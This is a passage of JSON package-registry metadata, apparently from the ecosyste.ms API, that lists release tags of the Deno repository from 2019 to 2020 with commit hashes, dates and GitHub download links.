job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"